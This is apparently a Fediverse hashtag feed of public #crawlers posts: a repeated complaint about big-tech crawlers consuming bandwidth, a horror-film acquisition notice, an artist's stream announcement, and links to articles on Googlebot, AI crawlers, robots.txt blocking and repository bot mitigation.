#crawlers — Public Fediverse posts on home.social

FLOSSbOxIN @[email protected] · 2026-05-12 · 13:18 UTC

Fucking #crawlers of #meta #facebook #apple #google are easting bandwidth and creating nonsense. In the last 3 days meta developer crawlers alone ate up 850GB+ #bandwidth. Assholes.

#crawlers #meta #facebook #apple #google #bandwidth

FLOSSbOxIN @[email protected] · 2026-05-12 · 13:18 UTC

Fucking #crawlers of #meta #facebook #apple #google are easting bandwidth and creating nonsense. In the last 3 days meta developer crawlers alone ate up 850GB+ #bandwidth. Assholes.

#crawlers #meta #facebook #apple #google #bandwidth

FLOSSbOxIN @[email protected] · 2026-05-12 · 13:18 UTC

Fucking #crawlers of #meta #facebook #apple #google are easting bandwidth and creating nonsense. In the last 3 days meta developer crawlers alone ate up 850GB+ #bandwidth. Assholes.

#crawlers #meta #facebook #apple #google #bandwidth

FLOSSbOxIN @[email protected] · 2026-05-12 · 13:18 UTC

Fucking #crawlers of #meta #facebook #apple #google are easting bandwidth and creating nonsense. In the last 3 days meta developer crawlers alone ate up 850GB+ #bandwidth. Assholes.

#bandwidth #google #apple #facebook #meta #crawlers

FLOSSbOxIN @[email protected] · 2026-05-12 · 13:18 UTC

Fucking #crawlers of #meta #facebook #apple #google are easting bandwidth and creating nonsense. In the last 3 days meta developer crawlers alone ate up 850GB+ #bandwidth. Assholes.

#crawlers #meta #facebook #apple #google #bandwidth

Deadline @[email protected] · 2026-04-30 · 16:55 UTC

Spider-Horror Pic ‘Crawlers’ Acquired By Roadside Attractions & Saban Films
#Acquisitions #News #Crawlers #RoadsideAttractions #SabanFilms

https://deadline.com/2026/04/crawlers-roadside-attractions-1236877140/

#acquisitions #news #crawlers #roadsideattractions #sabanfilms

🍂:･*Fweeblies*:･🍂 @[email protected] · 2026-04-20 · 21:13 UTC

We're live!

Avali Week AND 420? Hell yeah!
$145 flat colors and $25 crawlers!
See ya there!

https://fweeblies.art

#twitch #stream #avaliweek #420 #crawlers #avali

#twitch #stream #avaliweek #crawlers #avali

🍂:･*Fweeblies*:･🍂 @[email protected] · 2026-04-15 · 05:14 UTC

Oh look even more crawlers lmao

#crawlers #fresnonightcrawler #cryptidapril

Inautilo @[email protected] · 2026-04-01 · 13:29 UTC

#Development #Explainers
Inside Googlebot · How Google’s crawl system decides which content gets indexed https://ilo.im/16btho

_____
#Business #Google #SearchEngine #SEO #Crawlers #Content #RobotsTxt #Development #WebDev #Frontend

#content #robotstxt #webdev #frontend #development #explainers

mvc1095 (they) @[email protected] · 2026-03-27 · 12:14 UTC

Quo Vadis, Crawlers? Progress and what’s next on safeguarding our infrastructure https://diff.wikimedia.org/2026/03/26/quo-vadis-crawlers-progress-and-whats-next-on-safeguarding-our-infrastructure/ #AI, #AIDataCrawlers, #Crawlers, #Infrastructure, #Knowledge, #KnowledgeAsAService, #Scraping, #ScrapingBots, #WebScraping, #WikimediaFoundation, #WikimediaProjects

#ai #aidatacrawlers #crawlers #infrastructure #knowledge #knowledgeasaservice

Inautilo @[email protected] · 2026-03-10 · 14:45 UTC

#Development #Findings
Markdown, llms.txt, and AI crawlers · Do Markdown and llms.txt matter for your website? https://ilo.im/16b5qb

_____
#Business #SEO #SearchEngines #AI #Crawlers #Content #Website #Markdown #LlmsTxt #RobotsTxt

#development #findings #business #seo #searchengines #ai

Inautilo @[email protected] · 2026-03-02 · 05:05 UTC

#Business #Reports
Anthropic details how Claude crawls sites · How to block the three separate user agents https://ilo.im/16ax7y

_____
#AI #Claude #Crawlers #UserAgents #RobotsTxt #Content #Website #WebDev #Frontend #Backend

#business #reports #ai #claude #crawlers #useragents

Inautilo @[email protected] · 2026-02-10 · 20:31 UTC

#Development #Reports
Google lists Googlebot file limits · Do Google’s crawling limits affect your website? https://ilo.im/16adna

_____
#Business #Google #SearchEngine #Crawlers #Googlebot #Files #HTML #PDF #WebDev #Frontend

#development #reports #business #google #searchengine #crawlers

Inautilo @[email protected] · 2026-02-10 · 03:57 UTC

#Development #Challenges
Webspace invaders · Let’s level up our anti-AI scraping game! https://ilo.im/16ahl8

_____
#AI #Crawlers #RobotsTxt #RateLimiting #WAFs #Cloudflare #IndieWeb #WebDev #Frontend #Backend

#development #challenges #ai #crawlers #robotstxt #ratelimiting

Coalition for Networked Info @[email protected] · 2026-01-23 · 15:59 UTC

🤖 The Confederation of Open Access Repositories (COAR) has just announced the new Dealing with AI Bots website (https://dealing-with-bots.coar-repositories.org/) that provides a wealth of information on bots and #crawlers impacting the services and operations of open #repositories, including mitigation strategies; see:
https://coar-repositories.org/news-updates/mitigating-the-impact-of-ai-bots/

#crawlers #repositories